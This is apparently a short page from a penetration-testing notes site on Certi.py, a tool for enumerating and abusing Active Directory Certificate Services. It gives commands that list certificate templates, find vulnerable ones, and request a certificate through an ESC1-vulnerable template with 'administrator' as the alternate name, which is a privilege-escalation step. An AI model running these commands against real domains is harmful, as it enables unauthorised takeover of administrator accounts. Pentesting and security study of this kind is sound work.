search
Page cover

Certi

Certi.py can be leveraged with any set of credentials (or TGT) on an Active Directory domain to enumerate AD CS information from a remote Linux host.

LogoGitHub - zer1t0/certi: ADCS abuserGitHubchevron-right

hashtag
Setup

hashtag
Listing all Certificate Templates

-- python3 certi.py list domain.local/user:pass

hashtag
Listing all Vulnerable Certificate Templates

-- python3 certi.py list domain.local/user:pass -vuln

hashtag
Enrolling in a Certificate Template Vulnerable to ESC1

-- python3 certi.py req domain.local/[email protected] <CA Service Name> -k -n -alt-name administrator -template <vulnerable template>

PreviousBloodHoundNextCoercer

Last updated